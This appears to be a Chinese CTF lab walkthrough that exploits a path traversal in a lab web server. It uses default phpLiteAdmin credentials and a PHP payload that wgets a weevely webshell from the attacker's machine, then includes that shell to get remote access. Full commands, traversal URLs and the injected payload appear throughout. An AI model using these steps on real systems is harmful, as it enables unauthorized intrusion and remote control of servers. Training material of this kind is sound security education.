1. 程式人生 > 其它 >【CTF】路徑遍歷實戰

【CTF】路徑遍歷實戰

kali:192.168.223.131
target:192.168.223.171

通過arp-scan -l獲取目標IP為192.168.223.171,nmap掃描一下,開放22、80、111、39682埠

nmap -p- -A 192.168.223.171

看一眼網頁,是單頁部落格,使用web掃描工具nikto看看有沒有敏感資訊

nikto -h http://192.168.223.171

再開個dirb進行掃描

dirb http://192.168.223.171

掃描到一個dbadmin的檔案,裡面有test_db.php的檔案

點開是個登陸視窗,Google搜尋phpLiteAdmin預設密碼是admin登陸

再通過owasp-zap進行掃描

owasp-zap    //開啟圖形化軟體
//直接輸入目標網站url,開始掃描後結果都放在Alerts欄目下

由於我是kali中文版,正常應該是Alerts,Alerts裡面越紅表示越危險,其中第一個是一個目錄遍歷的漏洞,發現裡面的/etc/passwd

192.168.223.171/view.php?page=../../../../../../../etc/passwd

利用weevely生成木馬

//密碼是123456
weevely generate 123456 /root/shell.php

利用目錄遍歷漏洞,建立一個shell.php的庫,表名是a,裡面有一個欄位b,型別是text,目的是在b欄位插入值,下載kali上儲存的木馬檔案

<?php system("cd /tmp;wget http://192.168.223.131:8000/shell.php;chmod +x shell.php;");?>

通過python開啟8000埠

python -m SimpleHTTPServer

訪問網站儲存該表的位置

192.168.223.171/view.php?page=../../../../../../../usr/databases/shell.php

此時網站將會下載檔案,注意HTTPServer開啟的位置下需要有木馬檔案,否則路徑錯誤

此時獲取檔案儲存位置後連線即可

weevely http://192.168.223.171/view.php?page=../../../../../../../tmp/shell.php 123456